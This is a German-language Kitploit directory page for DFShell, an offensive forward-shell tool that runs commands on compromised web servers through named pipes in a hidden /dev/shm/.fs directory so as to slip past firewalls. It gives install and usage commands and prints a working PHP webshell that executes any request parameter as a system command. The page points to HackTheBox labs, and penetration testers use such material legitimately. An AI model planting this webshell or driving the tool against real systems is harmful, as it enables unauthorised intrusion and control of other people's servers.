Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DFShell — Python-basiertes Forward-Shell-Tool, das eine TTY-ähnliche interaktive Shell über HTTP mithilfe von Named Pipes erstellt und so die Befehlsausführung auf durch Firewalls geschützten Zielen ohne dauerhafte Netzwerkverbindungen ermöglicht. | Kitploit
Tools/GitHubGitHub/d3ext/dfshell
Payload-GenerierungShellcodeWebanwendungs-ExploitationPenetrationstests
GitHubd3ext/dfshell

DFShell

Python-basiertes Forward-Shell-Tool, das eine TTY-ähnliche interaktive Shell über HTTP mithilfe von Named Pipes erstellt und so die Befehlsausführung auf durch Firewalls geschützten Zielen ohne dauerhafte Netzwerkverbindungen ermöglicht.

Repository anzeigen
12219vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║  ██║██╔════╝██║     ██║     
██║  ██║█████╗  ███████╗███████║█████╗  ██║     ██║     
██║  ██║██╔══╝  ╚════██║██╔══██║██╔══╝  ██║     ██║     
██████╔╝██║     ███████║██║  ██║███████╗███████╗███████╗
╚═════╝ ╚═╝     ╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝                      

Einleitung

D3Ext's Forward Shell ist ein Python3-Skript, das mkfifo verwendet, um eine Shell auf dem Opferrechner zu simulieren. Es erstellt ein verstecktes Verzeichnis in /dev/shm/.fs/, in dem die Fifos gespeichert werden. Du kannst sogar ein TTY über die Webshell simulieren.

Erklärung

Diese Forward-Shell erstellt eine Shell, die Befehle über eine Named Pipe (mkfifo) entgegennimmt und die Ergebnisse in eine Datei ausgibt. Dadurch benötigt die Shell keine dauerhafte Netzwerkverbindung, sodass du ein ordentliches TTY hinter einer Firewall einrichten kannst, die Reverse-/Bind-Shells blockiert.

  1. Erstelle eine Named Pipe auf dem Zielserver
  2. Lese und führe Befehle aus, die von der Named Pipe empfangen werden
  3. Speichere STDOUT und STDERR in einer Ausgabedatei
  4. Gehe zurück zu Schritt 2 und lese erneut von der Named Pipe

Funktionen

  • Schnell und konfigurierbar
  • Integrierte leistungsstarke Befehle
  • Interaktive TTY-Shell

Installation

Von der Quelle installieren

root@kitploit:~
git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements.txt

Mit pip installieren

root@kitploit:~
pip3 install dfshell

Verwendung

DFShell bietet eine Vielzahl von CLI-Parametern zur verbesserten Konfiguration der Forward-Shell.

Hilfspanel

root@kitploit:~
usage: dfshell.py [-h] -u URL -p PARAMETER [-t TIMEOUT] [--path PATH] [-v VERBOSE]

D3Ext's Forward Shell - Enhanced forward shell with integrated commands

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     url of the webshell (i.e. http://10.10.10.10/webshell.php)
  -p PARAMETER, --parameter PARAMETER
                        parameter of the webshell to execute commands (i.e. cmd)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of requests that execute commands (default 20s)
  --path PATH           path in which to create named pipes (default /dev/shm/.fs)
  -v VERBOSE, --verbose VERBOSE
                        print more information

Es sendet GET-Anfragen an die angegebene URL, daher sollte die Webshell etwa so aussehen:

root@kitploit:~
<?php
  if(isset($_REQUEST['cmd']))
  {
    system($_REQUEST['cmd']);
  }
?>

Getestet auf Parrot OS mit einem Apache-Server

Wenn du dieses Tool in kontrollierten Umgebungen testen möchtest, findest du hier eine Liste von HackTheBox-Maschinen, auf denen Firewall-Regeln auf dem Webserver angewendet werden, sodass die Forward-Shell eine großartige Alternative ist, um direkt zur Privilegienausweitung überzugehen.

  • Inception




Demo

Referenzen

Dank an @ippsec für diese großartige Technik

root@kitploit:~
https://github.com/IppSec/forward-shell
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux#forward-shell
https://www.f5.com/labs/learning-center/forward-and-reverse-shells
https://github.com/Hypnoze57/FShell
https://s4vitar.github.io/ttyoverhttp/

Mitwirken

Siehe CONTRIBUTING.md

Changelog

Siehe CHANGELOG.md

Lizenz

Dieses Projekt steht unter der MIT-Lizenz

Copyright © 2023, D3Ext

Unterstützung

Kauf mir einen Kaffee

Tool herunterladen